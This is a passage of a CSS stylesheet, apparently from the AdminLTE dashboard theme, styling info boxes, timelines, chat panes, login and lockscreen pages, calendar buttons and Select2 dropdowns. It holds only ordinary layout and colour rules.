.small-box:hover .icon > i.fa, .small-box:hover .icon > i.fas, .small-box:hover .icon > i.far, .small-box:hover .icon > i.fab, .small-box:hover .icon > i.glyphicon, .small-box:hover .icon > i.ion {
font-size: 75px;
}
@media (max-width: 767.98px) {
.small-box {
text-align: center;
}
.small-box .icon {
display: none;
}
.small-box p {
font-size: 12px;
}
}
.info-box {
box-shadow: 0 0 1px rgba(0, 0, 0, 0.125), 0 1px 3px rgba(0, 0, 0, 0.2);
border-radius: 0.25rem;
background: #ffffff;
display: -ms-flexbox;
display: flex;
margin-bottom: 1rem;
min-height: 80px;
padding: .5rem;
position: relative;
}
.info-box .progress {
background-color: rgba(0, 0, 0, 0.125);
height: 2px;
margin: 5px 0;
}
.info-box .progress .progress-bar {
background-color: #ffffff;
}
.info-box .info-box-icon {
border-radius: 0.25rem;
-ms-flex-align: center;
align-items: center;
display: -ms-flexbox;
display: flex;
font-size: 1.875rem;
-ms-flex-pack: center;
justify-content: center;
text-align: center;
width: 70px;
}
.info-box .info-box-icon > img {
max-width: 100%;
}
.info-box .info-box-content {
-ms-flex: 1;
flex: 1;
padding: 5px 10px;
}
.info-box .info-box-number {
display: block;
font-weight: 700;
}
.info-box .progress-description,
.info-box .info-box-text {
display: block;
overflow: hidden;
text-overflow: ellipsis;
white-space: nowrap;
}
.info-box .info-box .bg-primary,
.info-box .info-box .bg-gradient-primary {
color: #ffffff;
}
.info-box .info-box .bg-primary .progress-bar,
.info-box .info-box .bg-gradient-primary .progress-bar {
background-color: #ffffff;
}
.info-box .info-box .bg-secondary,
.info-box .info-box .bg-gradient-secondary {
color: #ffffff;
}
.info-box .info-box .bg-secondary .progress-bar,
.info-box .info-box .bg-gradient-secondary .progress-bar {
background-color: #ffffff;
}
.info-box .info-box .bg-success,
.info-box .info-box .bg-gradient-success {
color: #ffffff;
}
.info-box .info-box .bg-success .progress-bar,
.info-box .info-box .bg-gradient-success .progress-bar {
background-color: #ffffff;
}
.info-box .info-box .bg-info,
.info-box .info-box .bg-gradient-info {
color: #ffffff;
}
.info-box .info-box .bg-info .progress-bar,
.info-box .info-box .bg-gradient-info .progress-bar {
background-color: #ffffff;
}
.info-box .info-box .bg-warning,
.info-box .info-box .bg-gradient-warning {
color: #1F2D3D;
}
.info-box .info-box .bg-warning .progress-bar,
.info-box .info-box .bg-gradient-warning .progress-bar {
background-color: #1F2D3D;
}
.info-box .info-box .bg-danger,
.info-box .info-box .bg-gradient-danger {
color: #ffffff;
}
.info-box .info-box .bg-danger .progress-bar,
.info-box .info-box .bg-gradient-danger .progress-bar {
background-color: #ffffff;
}
.info-box .info-box .bg-light,
.info-box .info-box .bg-gradient-light {
color: #1F2D3D;
}
.info-box .info-box .bg-light .progress-bar,
.info-box .info-box .bg-gradient-light .progress-bar {
background-color: #1F2D3D;
}
.info-box .info-box .bg-dark,
.info-box .info-box .bg-gradient-dark {
color: #ffffff;
}
.info-box .info-box .bg-dark .progress-bar,
.info-box .info-box .bg-gradient-dark .progress-bar {
background-color: #ffffff;
}
.info-box .info-box-more {
display: block;
}
.info-box .progress-description {
margin: 0;
}
@media (min-width: 768px) {
.col-xl-2 .info-box .progress-description,
.col-lg-2 .info-box .progress-description,
.col-md-2 .info-box .progress-description {
display: none;
}
.col-xl-3 .info-box .progress-description,
.col-lg-3 .info-box .progress-description,
.col-md-3 .info-box .progress-description {
display: none;
}
}
@media (min-width: 992px) {
.col-xl-2 .info-box .progress-description,
.col-lg-2 .info-box .progress-description,
.col-md-2 .info-box .progress-description {
font-size: 0.75rem;
display: block;
}
.col-xl-3 .info-box .progress-description,
.col-lg-3 .info-box .progress-description,
.col-md-3 .info-box .progress-description {
font-size: 0.75rem;
display: block;
}
}
@media (min-width: 1200px) {
.col-xl-2 .info-box .progress-description,
.col-lg-2 .info-box .progress-description,
.col-md-2 .info-box .progress-description {
font-size: 1rem;
display: block;
}
.col-xl-3 .info-box .progress-description,
.col-lg-3 .info-box .progress-description,
.col-md-3 .info-box .progress-description {
font-size: 1rem;
display: block;
}
}
.timeline {
margin: 0 0 45px;
padding: 0;
position: relative;
}
.timeline::before {
border-radius: 0.25rem;
background: #dee2e6;
bottom: 0;
content: '';
left: 31px;
margin: 0;
position: absolute;
top: 0;
width: 4px;
}
.timeline > div {
margin-bottom: 15px;
margin-right: 10px;
position: relative;
}
.timeline > div::before, .timeline > div::after {
content: "";
display: table;
}
.timeline > div > .timeline-item {
box-shadow: 0 0 1px rgba(0, 0, 0, 0.125), 0 1px 3px rgba(0, 0, 0, 0.2);
border-radius: 0.25rem;
background: #ffffff;
color: #495057;
margin-left: 60px;
margin-right: 15px;
margin-top: 0;
padding: 0;
position: relative;
}
.timeline > div > .timeline-item > .time {
color: #999;
float: right;
font-size: 12px;
padding: 10px;
}
.timeline > div > .timeline-item > .timeline-header {
border-bottom: 1px solid rgba(0, 0, 0, 0.125);
color: #495057;
font-size: 16px;
line-height: 1.1;
margin: 0;
padding: 10px;
}
.timeline > div > .timeline-item > .timeline-header > a {
font-weight: 600;
}
.timeline > div > .timeline-item > .timeline-body,
.timeline > div > .timeline-item > .timeline-footer {
padding: 10px;
}
.timeline > div > .timeline-item > .timeline-body > img {
margin: 10px;
}
.timeline > div > .timeline-item > .timeline-body > dl, .timeline > div > .timeline-item > .timeline-body ol, .timeline > div > .timeline-item > .timeline-body ul {
margin: 0;
}
.timeline > div > .timeline-item > .timeline-footer > a {
color: #ffffff;
}
.timeline > div > .fa,
.timeline > div > .fas,
.timeline > div > .far,
.timeline > div > .fab,
.timeline > div > .glyphicon,
.timeline > div > .ion {
background: #adb5bd;
border-radius: 50%;
font-size: 15px;
height: 30px;
left: 18px;
line-height: 30px;
position: absolute;
text-align: center;
top: 0;
width: 30px;
}
.timeline > .time-label > span {
border-radius: 4px;
background-color: #ffffff;
display: inline-block;
font-weight: 600;
padding: 5px;
}
.timeline-inverse > div > .timeline-item {
box-shadow: none;
background: #f8f9fa;
border: 1px solid #dee2e6;
}
.timeline-inverse > div > .timeline-item > .timeline-header {
border-bottom-color: #dee2e6;
}
.products-list {
list-style: none;
margin: 0;
padding: 0;
}
.products-list > .item {
border-radius: 0.25rem;
background: #ffffff;
padding: 10px 0;
}
.products-list > .item::after {
display: block;
clear: both;
content: "";
}
.products-list .product-img {
float: left;
}
.products-list .product-img img {
height: 50px;
width: 50px;
}
.products-list .product-info {
margin-left: 60px;
}
.products-list .product-title {
font-weight: 600;
}
.products-list .product-description {
color: #6c757d;
display: block;
overflow: hidden;
text-overflow: ellipsis;
white-space: nowrap;
}
.product-list-in-card > .item {
border-radius: 0;
border-bottom: 1px solid rgba(0, 0, 0, 0.125);
}
.product-list-in-card > .item:last-of-type {
border-bottom-width: 0;
}
.direct-chat .card-body {
overflow-x: hidden;
padding: 0;
position: relative;
}
.direct-chat.chat-pane-open .direct-chat-contacts {
-webkit-transform: translate(0, 0);
transform: translate(0, 0);
}
.direct-chat.timestamp-light .direct-chat-timestamp {
color: #30465f;
}
.direct-chat.timestamp-dark .direct-chat-timestamp {
color: #cccccc;
}
.direct-chat-messages {
-webkit-transform: translate(0, 0);
transform: translate(0, 0);
height: 250px;
overflow: auto;
padding: 10px;
}
.direct-chat-msg,
.direct-chat-text {
display: block;
}
.direct-chat-msg {
margin-bottom: 10px;
}
.direct-chat-msg::after {
display: block;
clear: both;
content: "";
}
.direct-chat-messages,
.direct-chat-contacts {
transition: -webkit-transform .5s ease-in-out;
transition: transform .5s ease-in-out;
transition: transform .5s ease-in-out, -webkit-transform .5s ease-in-out;
}
.direct-chat-text {
border-radius: 0.3rem;
background: #d2d6de;
border: 1px solid #d2d6de;
color: #444;
margin: 5px 0 0 50px;
padding: 5px 10px;
position: relative;
}
.direct-chat-text::after, .direct-chat-text::before {
border: solid transparent;
border-right-color: #d2d6de;
content: ' ';
height: 0;
pointer-events: none;
position: absolute;
right: 100%;
top: 15px;
width: 0;
}
.direct-chat-text::after {
border-width: 5px;
margin-top: -5px;
}
.direct-chat-text::before {
border-width: 6px;
margin-top: -6px;
}
.right .direct-chat-text {
margin-left: 0;
margin-right: 50px;
}
.right .direct-chat-text::after, .right .direct-chat-text::before {
border-left-color: #d2d6de;
border-right-color: transparent;
left: 100%;
right: auto;
}
.direct-chat-img {
border-radius: 50%;
float: left;
height: 40px;
width: 40px;
}
.right .direct-chat-img {
float: right;
}
.direct-chat-infos {
display: block;
font-size: 0.875rem;
margin-bottom: 2px;
}
.direct-chat-name {
font-weight: 600;
}
.direct-chat-timestamp {
color: #697582;
}
.direct-chat-contacts-open .direct-chat-contacts {
-webkit-transform: translate(0, 0);
transform: translate(0, 0);
}
.direct-chat-contacts {
-webkit-transform: translate(101%, 0);
transform: translate(101%, 0);
background: #343a40;
bottom: 0;
color: #ffffff;
height: 250px;
overflow: auto;
position: absolute;
top: 0;
width: 100%;
}
.direct-chat-contacts-light {
background: #f8f9fa;
}
.direct-chat-contacts-light .contacts-list-name {
color: #495057;
}
.direct-chat-contacts-light .contacts-list-date {
color: #6c757d;
}
.direct-chat-contacts-light .contacts-list-msg {
color: #545b62;
}
.contacts-list {
padding-left: 0;
list-style: none;
}
.contacts-list > li {
border-bottom: 1px solid rgba(0, 0, 0, 0.2);
margin: 0;
padding: 10px;
}
.contacts-list > li::after {
display: block;
clear: both;
content: "";
}
.contacts-list > li:last-of-type {
border-bottom: 0;
}
.contacts-list-img {
border-radius: 50%;
float: left;
width: 40px;
}
.contacts-list-info {
color: #ffffff;
margin-left: 45px;
}
.contacts-list-name,
.contacts-list-status {
display: block;
}
.contacts-list-name {
font-weight: 600;
}
.contacts-list-status {
font-size: 0.875rem;
}
.contacts-list-date {
color: #ced4da;
font-weight: normal;
}
.contacts-list-msg {
color: #b1bbc4;
}
.direct-chat-primary .right > .direct-chat-text {
background: #007bff;
border-color: #007bff;
color: #ffffff;
}
.direct-chat-primary .right > .direct-chat-text::after, .direct-chat-primary .right > .direct-chat-text::before {
border-left-color: #007bff;
}
.direct-chat-secondary .right > .direct-chat-text {
background: #6c757d;
border-color: #6c757d;
color: #ffffff;
}
.direct-chat-secondary .right > .direct-chat-text::after, .direct-chat-secondary .right > .direct-chat-text::before {
border-left-color: #6c757d;
}
.direct-chat-success .right > .direct-chat-text {
background: #28a745;
border-color: #28a745;
color: #ffffff;
}
.direct-chat-success .right > .direct-chat-text::after, .direct-chat-success .right > .direct-chat-text::before {
border-left-color: #28a745;
}
.direct-chat-info .right > .direct-chat-text {
background: #17a2b8;
border-color: #17a2b8;
color: #ffffff;
}
.direct-chat-info .right > .direct-chat-text::after, .direct-chat-info .right > .direct-chat-text::before {
border-left-color: #17a2b8;
}
.direct-chat-warning .right > .direct-chat-text {
background: #ffc107;
border-color: #ffc107;
color: #1F2D3D;
}
.direct-chat-warning .right > .direct-chat-text::after, .direct-chat-warning .right > .direct-chat-text::before {
border-left-color: #ffc107;
}
.direct-chat-danger .right > .direct-chat-text {
background: #dc3545;
border-color: #dc3545;
color: #ffffff;
}
.direct-chat-danger .right > .direct-chat-text::after, .direct-chat-danger .right > .direct-chat-text::before {
border-left-color: #dc3545;
}
.direct-chat-light .right > .direct-chat-text {
background: #f8f9fa;
border-color: #f8f9fa;
color: #1F2D3D;
}
.direct-chat-light .right > .direct-chat-text::after, .direct-chat-light .right > .direct-chat-text::before {
border-left-color: #f8f9fa;
}
.direct-chat-dark .right > .direct-chat-text {
background: #343a40;
border-color: #343a40;
color: #ffffff;
}
.direct-chat-dark .right > .direct-chat-text::after, .direct-chat-dark .right > .direct-chat-text::before {
border-left-color: #343a40;
}
.direct-chat-lightblue .right > .direct-chat-text {
background: #3c8dbc;
border-color: #3c8dbc;
color: #ffffff;
}
.direct-chat-lightblue .right > .direct-chat-text::after, .direct-chat-lightblue .right > .direct-chat-text::before {
border-left-color: #3c8dbc;
}
.direct-chat-navy .right > .direct-chat-text {
background: #001f3f;
border-color: #001f3f;
color: #ffffff;
}
.direct-chat-navy .right > .direct-chat-text::after, .direct-chat-navy .right > .direct-chat-text::before {
border-left-color: #001f3f;
}
.direct-chat-olive .right > .direct-chat-text {
background: #3d9970;
border-color: #3d9970;
color: #ffffff;
}
.direct-chat-olive .right > .direct-chat-text::after, .direct-chat-olive .right > .direct-chat-text::before {
border-left-color: #3d9970;
}
.direct-chat-lime .right > .direct-chat-text {
background: #01ff70;
border-color: #01ff70;
color: #1F2D3D;
}
.direct-chat-lime .right > .direct-chat-text::after, .direct-chat-lime .right > .direct-chat-text::before {
border-left-color: #01ff70;
}
.direct-chat-fuchsia .right > .direct-chat-text {
background: #f012be;
border-color: #f012be;
color: #ffffff;
}
.direct-chat-fuchsia .right > .direct-chat-text::after, .direct-chat-fuchsia .right > .direct-chat-text::before {
border-left-color: #f012be;
}
.direct-chat-maroon .right > .direct-chat-text {
background: #d81b60;
border-color: #d81b60;
color: #ffffff;
}
.direct-chat-maroon .right > .direct-chat-text::after, .direct-chat-maroon .right > .direct-chat-text::before {
border-left-color: #d81b60;
}
.direct-chat-blue .right > .direct-chat-text {
background: #007bff;
border-color: #007bff;
color: #ffffff;
}
.direct-chat-blue .right > .direct-chat-text::after, .direct-chat-blue .right > .direct-chat-text::before {
border-left-color: #007bff;
}
.direct-chat-indigo .right > .direct-chat-text {
background: #6610f2;
border-color: #6610f2;
color: #ffffff;
}
.direct-chat-indigo .right > .direct-chat-text::after, .direct-chat-indigo .right > .direct-chat-text::before {
border-left-color: #6610f2;
}
.direct-chat-purple .right > .direct-chat-text {
background: #6f42c1;
border-color: #6f42c1;
color: #ffffff;
}
.direct-chat-purple .right > .direct-chat-text::after, .direct-chat-purple .right > .direct-chat-text::before {
border-left-color: #6f42c1;
}
.direct-chat-pink .right > .direct-chat-text {
background: #e83e8c;
border-color: #e83e8c;
color: #ffffff;
}
.direct-chat-pink .right > .direct-chat-text::after, .direct-chat-pink .right > .direct-chat-text::before {
border-left-color: #e83e8c;
}
.direct-chat-red .right > .direct-chat-text {
background: #dc3545;
border-color: #dc3545;
color: #ffffff;
}
.direct-chat-red .right > .direct-chat-text::after, .direct-chat-red .right > .direct-chat-text::before {
border-left-color: #dc3545;
}
.direct-chat-orange .right > .direct-chat-text {
background: #fd7e14;
border-color: #fd7e14;
color: #1F2D3D;
}
.direct-chat-orange .right > .direct-chat-text::after, .direct-chat-orange .right > .direct-chat-text::before {
border-left-color: #fd7e14;
}
.direct-chat-yellow .right > .direct-chat-text {
background: #ffc107;
border-color: #ffc107;
color: #1F2D3D;
}
.direct-chat-yellow .right > .direct-chat-text::after, .direct-chat-yellow .right > .direct-chat-text::before {
border-left-color: #ffc107;
}
.direct-chat-green .right > .direct-chat-text {
background: #28a745;
border-color: #28a745;
color: #ffffff;
}
.direct-chat-green .right > .direct-chat-text::after, .direct-chat-green .right > .direct-chat-text::before {
border-left-color: #28a745;
}
.direct-chat-teal .right > .direct-chat-text {
background: #20c997;
border-color: #20c997;
color: #ffffff;
}
.direct-chat-teal .right > .direct-chat-text::after, .direct-chat-teal .right > .direct-chat-text::before {
border-left-color: #20c997;
}
.direct-chat-cyan .right > .direct-chat-text {
background: #17a2b8;
border-color: #17a2b8;
color: #ffffff;
}
.direct-chat-cyan .right > .direct-chat-text::after, .direct-chat-cyan .right > .direct-chat-text::before {
border-left-color: #17a2b8;
}
.direct-chat-white .right > .direct-chat-text {
background: #ffffff;
border-color: #ffffff;
color: #1F2D3D;
}
.direct-chat-white .right > .direct-chat-text::after, .direct-chat-white .right > .direct-chat-text::before {
border-left-color: #ffffff;
}
.direct-chat-gray .right > .direct-chat-text {
background: #6c757d;
border-color: #6c757d;
color: #ffffff;
}
.direct-chat-gray .right > .direct-chat-text::after, .direct-chat-gray .right > .direct-chat-text::before {
border-left-color: #6c757d;
}
.direct-chat-gray-dark .right > .direct-chat-text {
background: #343a40;
border-color: #343a40;
color: #ffffff;
}
.direct-chat-gray-dark .right > .direct-chat-text::after, .direct-chat-gray-dark .right > .direct-chat-text::before {
border-left-color: #343a40;
}
.users-list {
padding-left: 0;
list-style: none;
}
.users-list > li {
float: left;
padding: 10px;
text-align: center;
width: 25%;
}
.users-list > li img {
border-radius: 50%;
height: auto;
max-width: 100%;
}
.users-list > li > a:hover,
.users-list > li > a:hover .users-list-name {
color: #999;
}
.users-list-name,
.users-list-date {
display: block;
}
.users-list-name {
color: #495057;
font-size: 0.875rem;
overflow: hidden;
text-overflow: ellipsis;
white-space: nowrap;
}
.users-list-date {
color: #748290;
font-size: 12px;
}
.card-widget {
border: 0;
position: relative;
}
.widget-user .widget-user-header {
border-top-left-radius: 0.25rem;
border-top-right-radius: 0.25rem;
height: 135px;
padding: 1rem;
text-align: center;
}
.widget-user .widget-user-username {
font-size: 25px;
font-weight: 300;
margin-bottom: 0;
margin-top: 0;
text-shadow: 0 1px 1px rgba(0, 0, 0, 0.2);
}
.widget-user .widget-user-desc {
margin-top: 0;
}
.widget-user .widget-user-image {
left: 50%;
margin-left: -45px;
position: absolute;
top: 80px;
}
.widget-user .widget-user-image > img {
border: 3px solid #ffffff;
height: auto;
width: 90px;
}
.widget-user .card-footer {
padding-top: 50px;
}
.widget-user-2 .widget-user-header {
border-top-left-radius: 0.25rem;
border-top-right-radius: 0.25rem;
padding: 1rem;
}
.widget-user-2 .widget-user-username {
font-size: 25px;
font-weight: 300;
margin-bottom: 5px;
margin-top: 5px;
}
.widget-user-2 .widget-user-desc {
margin-top: 0;
}
.widget-user-2 .widget-user-username,
.widget-user-2 .widget-user-desc {
margin-left: 75px;
}
.widget-user-2 .widget-user-image > img {
float: left;
height: auto;
width: 65px;
}
.mailbox-messages > .table {
margin: 0;
}
.mailbox-controls {
padding: 5px;
}
.mailbox-controls.with-border {
border-bottom: 1px solid rgba(0, 0, 0, 0.125);
}
.mailbox-read-info {
border-bottom: 1px solid rgba(0, 0, 0, 0.125);
padding: 10px;
}
.mailbox-read-info h3 {
font-size: 20px;
margin: 0;
}
.mailbox-read-info h5 {
margin: 0;
padding: 5px 0 0;
}
.mailbox-read-time {
color: #999;
font-size: 13px;
}
.mailbox-read-message {
padding: 10px;
}
.mailbox-attachments {
padding-left: 0;
list-style: none;
}
.mailbox-attachments li {
border: 1px solid #eee;
float: left;
margin-bottom: 10px;
margin-right: 10px;
width: 200px;
}
.mailbox-attachment-name {
color: #666;
font-weight: bold;
}
.mailbox-attachment-icon,
.mailbox-attachment-info,
.mailbox-attachment-size {
display: block;
}
.mailbox-attachment-info {
background: #f8f9fa;
padding: 10px;
}
.mailbox-attachment-size {
color: #999;
font-size: 12px;
}
.mailbox-attachment-size > span {
display: inline-block;
padding-top: 0.75rem;
}
.mailbox-attachment-icon {
color: #666;
font-size: 65px;
max-height: 132.5px;
padding: 20px 10px;
text-align: center;
}
.mailbox-attachment-icon.has-img {
padding: 0;
}
.mailbox-attachment-icon.has-img > img {
height: auto;
max-width: 100%;
}
.lockscreen {
background: #e9ecef;
}
.lockscreen .lockscreen-name {
font-weight: 600;
text-align: center;
}
.lockscreen-logo {
font-size: 35px;
font-weight: 300;
margin-bottom: 25px;
text-align: center;
}
.lockscreen-logo a {
color: #495057;
}
.lockscreen-wrapper {
margin: 0 auto;
margin-top: 10%;
max-width: 400px;
}
.lockscreen-item {
border-radius: 4px;
background: #ffffff;
margin: 10px auto 30px;
padding: 0;
position: relative;
width: 290px;
}
.lockscreen-image {
border-radius: 50%;
background: #ffffff;
left: -10px;
padding: 5px;
position: absolute;
top: -25px;
z-index: 10;
}
.lockscreen-image > img {
border-radius: 50%;
height: 70px;
width: 70px;
}
.lockscreen-credentials {
margin-left: 70px;
}
.lockscreen-credentials .form-control {
border: 0;
}
.lockscreen-credentials .btn {
background-color: #ffffff;
border: 0;
padding: 0 10px;
}
.lockscreen-footer {
margin-top: 10px;
}
.login-logo,
.register-logo {
font-size: 2.1rem;
font-weight: 300;
margin-bottom: .9rem;
text-align: center;
}
.login-logo a,
.register-logo a {
color: #495057;
}
.login-page,
.register-page {
-ms-flex-align: center;
align-items: center;
background: #e9ecef;
display: -ms-flexbox;
display: flex;
-ms-flex-direction: column;
flex-direction: column;
height: 100vh;
-ms-flex-pack: center;
justify-content: center;
}
.login-box,
.register-box {
width: 360px;
}
@media (max-width: 576px) {
.login-box,
.register-box {
margin-top: .5rem;
width: 90%;
}
}
.login-card-body,
.register-card-body {
background: #ffffff;
border-top: 0;
color: #666;
padding: 20px;
}
.login-card-body .input-group .form-control,
.register-card-body .input-group .form-control {
border-right: 0;
}
.login-card-body .input-group .form-control:focus,
.register-card-body .input-group .form-control:focus {
box-shadow: none;
}
.login-card-body .input-group .form-control:focus ~ .input-group-append .input-group-text,
.register-card-body .input-group .form-control:focus ~ .input-group-append .input-group-text {
border-color: #80bdff;
}
.login-card-body .input-group .form-control.is-valid:focus,
.register-card-body .input-group .form-control.is-valid:focus {
box-shadow: none;
}
.login-card-body .input-group .form-control.is-valid ~ .input-group-append .input-group-text,
.register-card-body .input-group .form-control.is-valid ~ .input-group-append .input-group-text {
border-color: #28a745;
}
.login-card-body .input-group .form-control.is-invalid:focus,
.register-card-body .input-group .form-control.is-invalid:focus {
box-shadow: none;
}
.login-card-body .input-group .form-control.is-invalid ~ .input-group-append .input-group-text,
.register-card-body .input-group .form-control.is-invalid ~ .input-group-append .input-group-text {
border-color: #dc3545;
}
.login-card-body .input-group .input-group-text,
.register-card-body .input-group .input-group-text {
background-color: transparent;
border-bottom-right-radius: 0.25rem;
border-left: 0;
border-top-right-radius: 0.25rem;
color: #777;
transition: border-color 0.15s ease-in-out, box-shadow 0.15s ease-in-out;
}
.login-box-msg,
.register-box-msg {
margin: 0;
padding: 0 20px 20px;
text-align: center;
}
.social-auth-links {
margin: 10px 0;
}
.error-page {
margin: 20px auto 0;
width: 600px;
}
@media (max-width: 767.98px) {
.error-page {
width: 100%;
}
}
.error-page > .headline {
float: left;
font-size: 100px;
font-weight: 300;
}
@media (max-width: 767.98px) {
.error-page > .headline {
float: none;
text-align: center;
}
}
.error-page > .error-content {
display: block;
margin-left: 190px;
}
@media (max-width: 767.98px) {
.error-page > .error-content {
margin-left: 0;
}
}
.error-page > .error-content > h3 {
font-size: 25px;
font-weight: 300;
}
@media (max-width: 767.98px) {
.error-page > .error-content > h3 {
text-align: center;
}
}
.invoice {
background: #ffffff;
border: 1px solid rgba(0, 0, 0, 0.125);
position: relative;
}
.invoice-title {
margin-top: 0;
}
.profile-user-img {
border: 3px solid #adb5bd;
margin: 0 auto;
padding: 3px;
width: 100px;
}
.profile-username {
font-size: 21px;
margin-top: 5px;
}
.post {
border-bottom: 1px solid #adb5bd;
color: #666;
margin-bottom: 15px;
padding-bottom: 15px;
}
.post:last-of-type {
border-bottom: 0;
margin-bottom: 0;
padding-bottom: 0;
}
.post .user-block {
margin-bottom: 15px;
width: 100%;
}
.post .row {
width: 100%;
}
.product-image {
max-width: 100%;
height: auto;
width: 100%;
}
.product-image-thumbs {
-ms-flex-align: stretch;
align-items: stretch;
display: -ms-flexbox;
display: flex;
margin-top: 2rem;
}
.product-image-thumb {
box-shadow: 0 1px 2px rgba(0, 0, 0, 0.075);
border-radius: 0.25rem;
background-color: #ffffff;
border: 1px solid #dee2e6;
display: -ms-flexbox;
display: flex;
margin-right: 1rem;
max-width: 7rem;
padding: 0.5rem;
}
.product-image-thumb img {
max-width: 100%;
height: auto;
-ms-flex-item-align: center;
align-self: center;
}
.product-image-thumb:hover {
opacity: 0.5;
}
.product-share a {
margin-right: .5rem;
}
.projects td {
vertical-align: middle;
}
.projects .list-inline {
margin-bottom: 0;
}
.projects img.table-avatar,
.projects .table-avatar img {
border-radius: 50%;
display: inline;
width: 2.5rem;
}
.projects .project-state {
text-align: center;
}
.fc-button {
background: #f8f9fa;
background-image: none;
border-bottom-color: #ddd;
border-color: #ddd;
color: #495057;
}
.fc-button:hover, .fc-button:active, .fc-button.hover {
background-color: #e9e9e9;
}
.fc-header-title h2 {
color: #666;
font-size: 15px;
line-height: 1.6em;
margin-left: 10px;
}
.fc-header-right {
padding-right: 10px;
}
.fc-header-left {
padding-left: 10px;
}
.fc-widget-header {
background: #fafafa;
}
.fc-grid {
border: 0;
width: 100%;
}
.fc-widget-header:first-of-type,
.fc-widget-content:first-of-type {
border-left: 0;
border-right: 0;
}
.fc-widget-header:last-of-type,
.fc-widget-content:last-of-type {
border-right: 0;
}
.fc-toolbar,
.fc-toolbar.fc-header-toolbar {
margin: 0;
padding: 1rem;
}
@media (max-width: 575.98px) {
.fc-toolbar {
-ms-flex-direction: column;
flex-direction: column;
}
.fc-toolbar .fc-left {
-ms-flex-order: 1;
order: 1;
margin-bottom: .5rem;
}
.fc-toolbar .fc-center {
-ms-flex-order: 0;
order: 0;
margin-bottom: .375rem;
}
.fc-toolbar .fc-right {
-ms-flex-order: 2;
order: 2;
}
}
.fc-day-number {
font-size: 20px;
font-weight: 300;
padding-right: 10px;
}
.fc-color-picker {
list-style: none;
margin: 0;
padding: 0;
}
.fc-color-picker > li {
float: left;
font-size: 30px;
line-height: 30px;
margin-right: 5px;
}
.fc-color-picker > li .fa,
.fc-color-picker > li .fas,
.fc-color-picker > li .far,
.fc-color-picker > li .fab,
.fc-color-picker > li .glyphicon,
.fc-color-picker > li .ion {
transition: -webkit-transform linear .3s;
transition: transform linear .3s;
transition: transform linear .3s, -webkit-transform linear .3s;
}
.fc-color-picker > li .fa:hover,
.fc-color-picker > li .fas:hover,
.fc-color-picker > li .far:hover,
.fc-color-picker > li .fab:hover,
.fc-color-picker > li .glyphicon:hover,
.fc-color-picker > li .ion:hover {
-webkit-transform: rotate(30deg);
transform: rotate(30deg);
}
#add-new-event {
transition: all linear .3s;
}
.external-event {
box-shadow: 0 0 1px rgba(0, 0, 0, 0.125), 0 1px 3px rgba(0, 0, 0, 0.2);
border-radius: 0.25rem;
cursor: move;
font-weight: bold;
margin-bottom: 4px;
padding: 5px 10px;
}
.external-event:hover {
box-shadow: inset 0 0 90px rgba(0, 0, 0, 0.2);
}
.select2-container--default .select2-selection--single {
border: 1px solid #ced4da;
padding: 0.46875rem 0.75rem;
height: calc(2.25rem + 2px);
}
.select2-container--default.select2-container--open .select2-selection--single {
border-color: #80bdff;
}
.select2-container--default .select2-dropdown {
border: 1px solid #ced4da;
}
.select2-container--default .select2-results__option {
padding: 6px 12px;
-moz-user-select: none;
-ms-user-select: none;
user-select: none;
-webkit-user-select: none;
}
.select2-container--default .select2-selection--single .select2-selection__rendered {
padding-left: 0;
height: auto;
margin-top: -3px;
}
.select2-container--default[dir="rtl"] .select2-selection--single .select2-selection__rendered {
padding-right: 6px;
padding-left: 20px;
}
.select2-container--default .select2-selection--single .select2-selection__arrow {
height: 31px;
right: 6px;
}
.select2-container--default .select2-selection--single .select2-selection__arrow b {
margin-top: 0;
}
.select2-container--default .select2-dropdown .select2-search__field,
.select2-container--default .select2-search--inline .select2-search__field {
border: 1px solid #ced4da;
}
.select2-container--default .select2-dropdown .select2-search__field:focus,
.select2-container--default .select2-search--inline .select2-search__field:focus {
outline: none;
border: 1px solid #80bdff;
}
.select2-container--default .select2-dropdown.select2-dropdown--below {
border-top: 0;
}
.select2-container--default .select2-dropdown.select2-dropdown--above {
border-bottom: 0;
}
.select2-container--default .select2-results__option[aria-disabled='true'] {
color: #6c757d;
}
.select2-container--default .select2-results__option[aria-selected='true'] {
background-color: #dee2e6;
}
.select2-container--default .select2-results__option[aria-selected='true'], .select2-container--default .select2-results__option[aria-selected='true']:hover {
color: #1F2D3D;
}
.select2-container--default .select2-results__option--highlighted {
background-color: #007bff;
color: #ffffff;
}
.select2-container--default .select2-results__option--highlighted[aria-selected], .select2-container--default .select2-results__option--highlighted[aria-selected]:hover {
background-color: #0074f0;
color: #ffffff;
}
.select2-container--default .select2-selection--multiple {
border: 1px solid #ced4da;
min-height: calc(2.25rem + 2px);
}
.select2-container--default .select2-selection--multiple:focus {
border-color: #80bdff;
}
.select2-container--default .select2-selection--multiple .select2-selection__rendered {
padding: 0 0.375rem 0.375rem;
margin-bottom: -0.375rem;
}
.select2-container--default .select2-selection--multiple .select2-selection__rendered li:first-child.select2-search.select2-search--inline {
width: 100%;
margin-left: 0.375rem;
}
.select2-container--default .select2-selection--multiple .select2-selection__rendered li:first-child.select2-search.select2-search--inline .select2-search__field {
width: 100% !important;
}
.select2-container--default .select2-selection--multiple .select2-selection__rendered .select2-search.select2-search--inline .select2-search__field {
border: 0;
margin-top: 6px;
}
.select2-container--default .select2-selection--multiple .select2-selection__choice {
background-color: #007bff;
border-color: #006fe6;
color: #ffffff;
padding: 0 10px;
margin-top: .31rem;
}
.select2-container--default .select2-selection--multiple .select2-selection__choice__remove {
color: rgba(255, 255, 255, 0.7);
float: right;
margin-left: 5px;
margin-right: -2px;
}
.select2-container--default .select2-selection--multiple .select2-selection__choice__remove:hover {
color: #ffffff;
}
.text-sm .select2-container--default .select2-selection--multiple .select2-search.select2-search--inline .select2-search__field, .select2-container--default .select2-selection--multiple.text-sm .select2-search.select2-search--inline .select2-search__field {
margin-top: 8px;
}
.text-sm .select2-container--default .select2-selection--multiple .select2-selection__choice, .select2-container--default .select2-selection--multiple.text-sm .select2-selection__choice {
margin-top: .4rem;
}
.select2-container--default.select2-container--focus .select2-selection--single,
.select2-container--default.select2-container--focus .select2-selection--multiple {
border-color: #80bdff;
}
.select2-container--default.select2-container--focus .select2-search__field {
border: 0;
}
.select2-container--default .select2-selection--single .select2-selection__rendered li {
padding-right: 10px;
}
.input-group-prepend ~ .select2-container--default .select2-selection {
border-bottom-left-radius: 0;
border-top-left-radius: 0;
}
.input-group > .select2-container--default:not(:last-child) .select2-selection {
border-bottom-right-radius: 0;
border-top-right-radius: 0;
}
.select2-container--bootstrap4.select2-container--focus .select2-selection {
box-shadow: none;
}
